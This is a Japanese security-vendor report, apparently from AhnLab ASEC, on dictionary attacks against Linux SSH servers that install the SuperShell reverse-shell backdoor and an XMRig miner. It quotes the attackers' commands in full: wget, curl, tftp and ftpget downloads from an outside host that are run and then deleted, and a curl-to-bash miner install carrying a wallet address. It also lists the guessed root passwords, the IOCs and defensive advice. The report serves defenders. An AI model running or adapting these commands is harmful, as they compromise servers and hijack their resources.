AhnLab Security Emergency response Center (ASEC)では最近、管理が適切に行われていない Linux SSH サーバーを対象にバックドアマルウェアである SuperShell をインストールする攻撃事例を確認した。SuperShell は中国語を使用する開発者により製作されたもので、Go 言語で開発され Windows や Linux、Android を含む様々なプラットフォームに対応している。実質的な機能はリバースシェルであり、攻撃者はこれを利用して感染システムを遠隔操作できる。
攻撃者は、複数のシステムを感染させたあと、スキャナーをインストールしたものと推定され、以下のような攻撃元から辞書攻撃によってログインを試みた。
| Attacker IP | ID/PW |
|---|---|
| 209.141.60[.]249 | root / qwer |
| 179.61.253[.]67 | root / password root / a123456789 root / a1234567 root / newroot root / 123qaz!@# root / Passw0rd root / 123qweASD root / abc123 root / daniel root / 1qaz@wsx |
| 107.189.8[.]15 | root / doctor |
| 2.58.84[.]90 | root / Admin123! root / 123456qwerty root / cocacola root / qweasd!@# |
攻撃に成功したあとは、以下のようなコマンドを実行して直接 SuperShell をインストールするか、ダウンローダー機能を担うシェルスクリプトをインストールした。SuperShell は Web サーバーだけでなく、FTP サーバーを通じてもダウンロードされた。
| # cd /tmp ; wget hxxp://45.15.143[.]197/ssh1 && chmod +x ssh1 ; ./ssh1; rm -r * # cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget hxxp://45.15.143[.]197/sensi.sh; curl -O hxxp://45.15.143[.]197/sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp 45.15.143[.]197 -c get sensi.sh; chmod 777 sensi.sh; sh sensi.sh; tftp -r sensi2.sh -g 45.15.143[.]197; chmod 777 sensi2.sh; sh sensi2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.15.143[.]197 sensi1.sh sensi1.sh; sh sensi1.sh; rm -rf sensi.sh sensi.sh sensi2.sh sensi1.sh; rm -rf * # cd /etc ; wget hxxp://45.15.143[.]197/ssh1 && chmod +x ssh1 ; ./ssh1 ; wget hxxp://45.15.143[.]197/x64.bin ; chmod +x x64.bin ; ./x64.bin ; rm -r * # cd /tmp ; curl hxxp://45.15.143[.]197:44581/ssh1.sh | sh ; wget hxxp://45.15.143[.]197:44581/ssh1.sh ; sh ssh1.sh ; rm -r * # cd /tmp ; curl -s -L hxxps://download.c3pool[.]org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALL=en_US.UTF-8 bash -s 871SNx3baWof8utKVRqJ6u5oGkXHPBv9GKMeQ99J8FxU23eKGgGMr3de7WhfwydWjCSeUGdZf5VC4J3PcPPCY1yoSFCG4xx ; wget hxxp://45.15.143[.]197:10086/supershell/compile/download/ssh1 ; chmod +x ssh1 ; ./ssh1 ; rm -r ssh1 |
最終的にインストールされたマルウェアは難読化されているが、少数の内部文字列と動作方式、そして実行プロセスで確認できる文字列を通じて、SuperShell バックドアであることが確認できる。
一般的に、管理が適切に行われていない Linux システムを対象とする攻撃では XMRig のようなコインマイナーや ShellBot、Tsunami のような DDoS Bot がインストールされる傾向がある。今回確認された攻撃で、攻撃者は操作権限の奪取目的で、まず SuperShell をインストールした。もちろん SuperShell と同時に XMRig モネロコインマイナーをインストールする事例が確認されていることからも、最終目的は仮想通貨の採掘であると見られる。
| 871SNx3baWof8utKVRqJ6u5oGkXHPBv9GKMeQ99J8FxU23eKGgGMr3de7WhfwydWjCSeUGdZf5VC4J3PcPPCY1yoSFCG4xx |
最近、管理が適切に行われていない Linux SSH サーバーを対象に、SuperShell バックドアがインストールされている。SuperShell がインストールされると、Linux サーバーは攻撃者のコマンドを受け取り操作権限を奪われることがある。
そのため、管理者はアカウントのパスワードを推測が困難な形式で設定し、定期的にパスワードを変更することで、総当たり攻撃や辞書攻撃から Linux サーバーを保護する必要があり、セキュリティパッチを最新にして脆弱性攻撃を防止するべきである。また、外部に公開されていてアクセスが可能なサーバーに関してはファイアウォールのようなセキュリティ製品を利用し、外部の攻撃者からのアクセスを統制しなければならない。最後に、V3 を最新バージョンにアップデートしてマルウェアへの感染を事前に遮断できるように注意を払う必要がある。
検知名
Backdoor/Linux.CobaltStrike.3753120 (2024.09.11.00)
Downloader/Shell.Agent.SC203780 (2024.09.11.00)
Downloader/Shell.ElfMiner.S1705 (2021.11.29.02)
IOC 関連情報
MD5
4ee4f1e7456bb2b3d13e93797b9efbd3
5ab6e938028e6e9766aa7574928eb062
e06a1ba2f45ba46b892bef017113af09
URL
http[:]//45[.]15[.]143[.]197/sensi[.]sh
http[:]//45[.]15[.]143[.]197/ssh1
http[:]//45[.]15[.]143[.]197/x64[.]bin
http[:]//45[.]15[.]143[.]197[:]10086/supershell/compile/download/ssh
http[:]//45[.]15[.]143[.]197[:]44581/ssh1
追加 IoC は ATIP で提供しています。
IP
107[.]189[.]8[.]15
179[.]61[.]253[.]67
2[.]58[.]84[.]90
209[.]141[.]60[.]249
45[.]15[.]143[.]197
追加 IoC は ATIP で提供しています。
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム 「AhnLab TIP」 サブスクリプションサービスを通して確認できる。